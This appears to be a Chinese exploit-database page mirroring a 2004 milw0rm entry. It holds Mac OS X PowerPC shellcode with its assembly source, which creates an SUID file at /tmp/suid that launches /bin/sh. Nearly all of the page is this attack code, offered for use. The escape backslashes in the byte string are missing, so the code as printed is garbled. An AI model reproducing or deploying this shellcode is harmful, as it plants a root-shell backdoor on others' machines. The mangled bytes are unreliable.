OSX/PPC – Create /tmp/suid Shellcode (122 bytes)
漏洞ID | 1054663 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | OSX_PPC | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does open(); write(); close(); exit();
See ASM below.
122 Bytes.
*/
char shellcode[] =
"x7cxa5x2ax79x40x82xffxfd"
"x7fxe8x02xa6x39x1fx01x71"
"x39x08xfexf4x7cxa8x29xae"
"x38x7fx01x68x38x63xfexf4"
"x38x80x02x01x38xa0xffxff"
"x39x40x01x70x38x0axfex95"
"x44xffxffx02x60x60x60x60"
"x38x9fx01x72x38x84xfexf4"
"x38xaaxfex9cx38x0axfex94"
"x44xffxffx02x60x60x60x60"
"x38x0axfex96x44xffxffx02"
"x60x60x60x60x38x0axfex91"
"x44xffxffx02x2fx74x6dx70"
"x2fx73x75x69x64x58x23x21"
"x2fx62x69x6ex2fx73x68x0a"
"x73x68";
int main (void)
{
__asm__("b _shellcode");
}
/*
; PPC OS X / Darwin Shellcode by B-r00t.
; open(); write(); close(); exit()
; Creates an SUID '/tmp/suid' to execute '/bin/sh'.
;
.globl _main
.text
_main:
xor. r5, r5, r5
bnel _main
mflr r31
addi r8, r31, 268+92+9
addi r8, r8, -268
stbx r5, r8, r5
addi r3, r31, 268+92
addi r3, r3, -268
li r4, 513
li r5, -1
li r10, 368
addi r0, r10, -363
.long 0x44ffff02
.long 0x60606060
addi r4, r31, 268+92+10
addi r4, r4, -268
addi r5, r10, -356
addi r0, r10, -364
.long 0x44ffff02
.long 0x60606060
addi r0, r10, -362
.long 0x44ffff02
.long 0x60606060
addi r0, r10, -367
.long 0x44ffff02
path: .asciz "/tmp/suidX#!/bin/shnsh"
*/
// milw0rm.com [2004-09-26]
相关推荐: FSF GNU glibc unsetenv Vulnerability
FSF GNU glibc unsetenv Vulnerability 漏洞ID 1104562 漏洞类型 Unknown 发布时间 1999-09-17 更新时间 1999-09-17 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVS…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666